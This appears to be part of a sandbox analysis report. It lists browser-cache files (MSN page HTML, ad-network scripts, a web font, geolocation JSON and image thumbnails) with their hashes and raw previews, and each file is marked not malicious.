                                                                                                                                                                                                                                                            Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\checksync[2].htm
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):21264
                                                                                                                                                                                                                                                            Entropy (8bit):5.302916912228596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOyQWwY4RXrqt:F86qhbS2RxF3OsyQWwY4RXrqt
                                                                                                                                                                                                                                                            MD5:3723567BA10CD7D40559BFA7B1E1228A
                                                                                                                                                                                                                                                            SHA1:FC9ADA3298BA47DC5BDA9334756C76CBB785C02C
                                                                                                                                                                                                                                                            SHA-256:803A03EC64D08C78CFF4E829177D7B175FA5509D5E571FA14B33496249C3AFA7
                                                                                                                                                                                                                                                            SHA-512:7878C552398289F7BBFFC7C5121C2CFCC62C24080DDDB42A9133943F55E8C7D6BDE787F0E1383D12469BA2DFD2F604861078180BFF09070B540E36CC755DE848
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\checksync[3].htm
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):21264
                                                                                                                                                                                                                                                            Entropy (8bit):5.302916912228596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOyQWwY4RXrqt:F86qhbS2RxF3OsyQWwY4RXrqt
                                                                                                                                                                                                                                                            MD5:3723567BA10CD7D40559BFA7B1E1228A
                                                                                                                                                                                                                                                            SHA1:FC9ADA3298BA47DC5BDA9334756C76CBB785C02C
                                                                                                                                                                                                                                                            SHA-256:803A03EC64D08C78CFF4E829177D7B175FA5509D5E571FA14B33496249C3AFA7
                                                                                                                                                                                                                                                            SHA-512:7878C552398289F7BBFFC7C5121C2CFCC62C24080DDDB42A9133943F55E8C7D6BDE787F0E1383D12469BA2DFD2F604861078180BFF09070B540E36CC755DE848
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\checksync[4].htm
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):21264
                                                                                                                                                                                                                                                            Entropy (8bit):5.302916912228596
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:R7AGcVXlblcqnzleZSweg2f5ngB/LkPF3OZOyQWwY4RXrqt:F86qhbS2RxF3OsyQWwY4RXrqt
                                                                                                                                                                                                                                                            MD5:3723567BA10CD7D40559BFA7B1E1228A
                                                                                                                                                                                                                                                            SHA1:FC9ADA3298BA47DC5BDA9334756C76CBB785C02C
                                                                                                                                                                                                                                                            SHA-256:803A03EC64D08C78CFF4E829177D7B175FA5509D5E571FA14B33496249C3AFA7
                                                                                                                                                                                                                                                            SHA-512:7878C552398289F7BBFFC7C5121C2CFCC62C24080DDDB42A9133943F55E8C7D6BDE787F0E1383D12469BA2DFD2F604861078180BFF09070B540E36CC755DE848
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":75,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"https:\/\/c21lg-d.m
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\de-ch[1].htm
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):429436
                                                                                                                                                                                                                                                            Entropy (8bit):5.442366725994335
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:zJdmJUhxx+JPkf8oYd4KNZ+t8EcefHoYXT/uU9gFse4e0A9La:zJAoOJmPfHoqaUOse4hAU
                                                                                                                                                                                                                                                            MD5:11C2EFA3A42F63B4D1AA1716F9C92443
                                                                                                                                                                                                                                                            SHA1:92CA5EB76B335A91D950724F86C87C607E0229F1
                                                                                                                                                                                                                                                            SHA-256:F83149A4021C0C6A2D1799EA20DC70A394CC54B1E73CF617E1450F33E259D559
                                                                                                                                                                                                                                                            SHA-512:70945B642FCD4AC76436973DC10A959DCCF8B2F4A152D368A460654D0B0B434399ACA773DBCB7A6FCF906B60B0D0F03701F0E744EC32C6B2A61B470ACA6D7602
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: <!DOCTYPE html><html prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" lang="de-CH" class="hiperf" dir="ltr" >.. <head data-info="v:20210601_21448660;a:5bd89466-26c6-4b85-ada8-ba182a83d4e1;cn:6;az:{did:951b20c4cd6d42d29795c846b4755d88, rid: 6, sn: neurope-prod-hp, dt: 2021-05-21T00:39:13.5192614Z, bt: 2021-06-01T00:12:19.8247979Z};ddpi:1;dpio:;dpi:1;dg:tmx.pc.ms.ie10plus;th:start;PageName:startPage;m:de-ch;cb:;l:de-ch;mu:de-ch;ud:{cid:,vk:homepage,n:,l:de-ch,ck:};xd:BBqgbZW;ovc:f;al:;fxd:f;xdpub:2021-06-01 08:04:58Z;xdmap:2021-06-03 16:02:24Z;axd:;f:msnallexpusers,muidflt12cf,muidflt14cf,muidflt56cf,muidflt259cf,mmxandroid1cf,startedge2cf,audexedge2cf,moneyedge1cf,starthp3cf,moneyhz1cf,article4cf,onetrustpoplive,1s-bing-news,vebudumu04302020,bbh20200521msncf,weather5cf,csmoney4cf,1s-bliscontrolw,prg-adspeek,csmoney7cf;userOptOut:false;userOptOutOptions:" data-js="{&quot;dpi&quot;:1.0,&quot;ddpi&quot;:1.0,&quot;dpio&quot;:null,&quot;forcedpi&quot;:null,&quot;dms&quot;:6000
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\location[1].js
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                                            Entropy (8bit):4.685293041881485
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                                                                                                                                                                                            MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                                                                                                                                                                                            SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                                                                                                                                                                                            SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                                                                                                                                                                                            SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                                                                                                            Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\nrrV56260[1].js
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):89487
                                                                                                                                                                                                                                                            Entropy (8bit):5.422082896007348
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:1VnCuukXGs7RiUGZFVgc5dJoH/BU5AJ8DuaHRaoUv1BYYL0E5Kfy4ar8u19oKL:NtiX/dJIxkujDv5KfyZ1
                                                                                                                                                                                                                                                            MD5:F147187D0D0DF2A444A64DA389F6F3F2
                                                                                                                                                                                                                                                            SHA1:9196F231D1204A4C0AF82E9D9E9B4B9C9FCEE248
                                                                                                                                                                                                                                                            SHA-256:D8D297DF2F4E4E532EC8BC45A966906E27E0C9EDFEB5BDFF6FA3F2531409DBFB
                                                                                                                                                                                                                                                            SHA-512:31F7CA2A199CC78E3549B01462A4782D83427CD07DEABD2FFDD2646B0F0FE8A1C5046001F39B05BAFAA0690C89417ED28E6D2C82789EAEDF438D46C739DE7760
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},c={};function d(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=d("conversionpixelcontroller"),e=d("browserhinter"),o=d("kwdClickTargetModifier"),i=d("hover"),t=d("mraidDelayedLogging"),n=d("macrokeywords"),a=d("tcfdatamanager"),c=d("l3-reporting-observer-adapter"),{conversionPixelController:r,browserHinter:e,hover:i,keywordClickTarget
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\4996b9[1].woff
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format, TrueType, length 45633, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):45633
                                                                                                                                                                                                                                                            Entropy (8bit):6.523183274214988
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:GiE2wcDeO5t68PKACfgVEwZfaDDxLQ0+nSEClr1X/7BXq/SH0Cl7dA7Q/B0WkAfO:82/DeO5M8PKASCZSvxQ0+TCPXtUSHF7c
                                                                                                                                                                                                                                                            MD5:A92232F513DC07C229DDFA3DE4979FBA
                                                                                                                                                                                                                                                            SHA1:EB6E465AE947709D5215269076F99766B53AE3D1
                                                                                                                                                                                                                                                            SHA-256:F477B53BF5E6E10FA78C41DEAF32FA4D78A657D7B2EFE85B35C06886C7191BB9
                                                                                                                                                                                                                                                            SHA-512:32A33CC9D6F2F1C962174F6CC636053A4BFA29A287AF72B2E2825D8FA6336850C902AB3F4C07FB4BF0158353EBBD36C0D367A5E358D9840D70B90B93DB2AE32D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                                                                                                                                                                                                                                                            Preview: wOFF.......A...........................,....OS/2...p...`...`B.Y.cmap.............G.glyf.......,...,0..Hhead.......6...6....hhea...,...$...$....hmtx............($LKloca...`...f...f....maxp...P... ... ....name............IU..post....... ... .*...........I.A_.<........... ........d.*.......................^...q.d.Z.................................................................3.......3.....f..............................HL .@...U...f.........................................\.d.\.d...d.e.d.Z.d.b.d.4.d.=.d.Y.d.c.d.].d.b.d.I.d.b.d.f.d._.d.^.d.(.d.b.d.^.d.b.d.b.d...d...d._.d._.d...d...d.P.d.0.d.b.d.b.d.P.d.u.d.c.d.^.d._.d.q.d._.d.d.d.b.d._.d._.d.b.d.a.d.b.d.a.d.b.d...d...d.^.d.^.d.`.d.[.d...d...d.$.d.p.d...d...d.^.d._.d.T.d...d.b.d.b.d.b.d.i.d.d.d...d...d...d.7.d.^.d.X.d.].d.).d.l.d.l.d.b.d.b.d.,.d.,.d.b.d.b.d...d...d...d.7.d.b.d.1.d.b.d.b.d...d...d...d...d...d.A.d...d...d.(.d.`.d...d...d.^.d.r.d.f.d.,.d.b.d...d.b.d._.d.q.d...d...d.b.d.b.d.b.d.b.d...d.r.d.I.d._.d.b.d.b.d.b.d.V.d.Z.d.b.d
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\52-478955-68ddb2ab[1].js
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):396481
                                                                                                                                                                                                                                                            Entropy (8bit):5.3246692794239046
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:DlY9z/aSg/jgyYdw4467hmnidlWPqIjHSjaeCraTgxO0Dvq4FcG6IuNK:eJ/hcnidlWPqIjHdfactHcGBt
                                                                                                                                                                                                                                                            MD5:B5BFFE45CF81B5A81F74C425DCF30B52
                                                                                                                                                                                                                                                            SHA1:683FDC1C77B30D56A2DD7D32FAD51DB1093C9260
                                                                                                                                                                                                                                                            SHA-256:E5C9B77B4CAFB53C72F500B09FB1DAB209AF5D9D914A72F2F5C7A1A128749579
                                                                                                                                                                                                                                                            SHA-512:5CC23F5CD661A1D80E7989E79AD5355A5685B52C9B5081CA3FC6721E0C378B429D84C2698D06EBA987ABD0764AFEAF0D0CF2A74D67C7CBB23B4C80359F64E9AD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview: var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r||{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\AAKDHsZ[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):8771
                                                                                                                                                                                                                                                            Entropy (8bit):7.922730883626357
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:Qob1+aErYaeNpFC7EYG40ssgYqf+NVrTTIUu9/0qwoD9rKRsd70k:bbrQe7cI60suqfMV7It0q/Ak
                                                                                                                                                                                                                                                            MD5:BF60DC94967A7389D2FDA16091C20A34
                                                                                                                                                                                                                                                            SHA1:DA8A8CE4E26BFF170C2E4C1AAD63CB404C5540F0
                                                                                                                                                                                                                                                            SHA-256:2F668E03B55FD9ADB919C9DCE9D747456DF9B5536DC2A925E81611BD6AFB29B2
                                                                                                                                                                                                                                                            SHA-512:197AF08E0BEB960293214B6B3CC08706DBCF6253FB4E5837AFD2D0E578BB1F8E42B0A5CC3AE313F7FC4C49693BD820489B213F002E8630B79F882AD879115A0D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKDHsZ.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=896&y=399
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z.....P...@....P.@..T....Tu$...:.2.._P85...Z.!..hA..=..4..G.D..D.....>.#.L.-f.B......`MW...).b.._...U.q..8.KTHP.@.@.......(...P .....(......B@...GZ.._..<.gb.Q.Oj.sQ4..0g...`..&.....~..*...Db...6.....:.\.z..9.g[w.....?0..[..)[DU...E.'.Fa....9.OT.2.V...l..u.....#..........EI.1.....4'mP4..i..2.v.=..vR..9*B.B.2..(.(..a@.@........P.@..-.%...05.ZAt4....].D.....Q.!}YF8b.&Tc....Z.....
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\AAKDiAr[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2042
                                                                                                                                                                                                                                                            Entropy (8bit):7.747742724470814
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QfAuETA4y0N53gXwHPJLtzBItPInXozQlwrB608:Qf7ERVfzHRLtFItPOXyQirs08
                                                                                                                                                                                                                                                            MD5:D8B2E7076283F5415C6C385D37C9721E
                                                                                                                                                                                                                                                            SHA1:5CE4280A515C6CD8B59EED3ADEF20A08FF32BBB3
                                                                                                                                                                                                                                                            SHA-256:B853C13465213A89709DECEF267B8C1334F391EF009CC50F635E81CEA07DF082
                                                                                                                                                                                                                                                            SHA-512:2EDD8771DAB399A21C87A36D30DE98B5B7A8EAD81198C3EB7DB56E2244F43FE6198015A888952D59BB82FD070978E23EA8061D823A4590620A0483DC2ED85589
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKDiAr.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2103&y=1402
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z@H(..i....PY..$...z...n.Ih...<Q`1..9._*...8.+.tWs..`?.....ope.r. .`LM0$....m*..$..8..._F.J.0....<...N.r.....2..q..E..>.T.x4....4.=...M.....2..._..I.b..`.._i.?.o`.q/u8@"'...1.ml.n.L./..J.a.;....7....Y.".I3.R2>.W.....&\.9Q...J|,..$..S..LFm....1;`c..#.x5,erF.8...1s@.h...Mk0..).....L..c.A}.....`.$.a...p(..V.^..O.$I........VW7..^......Gp.y#.......(.u(!..VEd...5.2@....J....H....3
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\AAKF3dk[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):9487
                                                                                                                                                                                                                                                            Entropy (8bit):7.72211318070143
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:Q2LGqbPuiCkWG1Db7K1qdznBVkWNgXQIJQX74DHHm6I:NzXCveDb2gFBaWNobeX74bjI
                                                                                                                                                                                                                                                            MD5:1E7BB0A8C346F1DDD6B10E578EC6B234
                                                                                                                                                                                                                                                            SHA1:56FF79191E93D21C703BDABD9457CCD876CF490E
                                                                                                                                                                                                                                                            SHA-256:F41D28AECA7D74B83F5A795862616623660BCE4E462E8F074771ED3C19E65A43
                                                                                                                                                                                                                                                            SHA-512:1745F3B05E01631E92151A8118A6B6B10CBF09660225A5EE30313ACBA774DB7F536F0E00AE3083C230AEA2245EA3AE80A14B2FAB8CFAC8A0CE84CDEBFC4C54E9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKF3dk.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1730&y=1292
                                                                                                                                                                                                                                                            Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?........%!....P.@..-0....P0.......P.@.0..(.i.S...@.0.@..P.@....R.....*@J...Zb..(........J.-...(......(........P.@.0...`..(......(.....R...P.H...@.......(.....@..P.@.0..(......(......(.....@.;.P.@....R...%...R......%..@-P...`..(......(......(......).P...P.H....(........R......(...@..%......@..P.@..%...R..... .`..P...@....S...P.@.@.@....P.@....(......(......)..@..P.@....P.@....P.@....S.....@
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\AAKFBJq[1].jpg
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2190
                                                                                                                                                                                                                                                            Entropy (8bit):7.75249438438381
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:QfAuETAgo2bH2/6aS5yURJByh4dQCXPCwmEIbFuUNzvf:Qf7EXb2BS5yULBZnEbFuMzvf
                                                                                                                                                                                                                                                            MD5:A4F282FF3AD90928D7F8E89F91EC1551
                                                                                                                                                                                                                                                            SHA1:1236E5430F40838B120C1A9298AE8672ABE20C56
                                                                                                                                                                                                                                                            SHA-256:F6A723E7634CD1AE637A90B62589D24D29EC6DF3FF0DF6F26440CE6269680F06
                                                                                                                                                                                                                                                            SHA-512:5AB00E03B4D4707867A1B4A791B34BA4857D13A2236B4425F760077FA40C6F0E462D576E343C09DF4B3A57A79B0E5C23058671F775644BB77E83A88AF9F9457A
                                                                                                                                                                                                                                                            Malicious:false
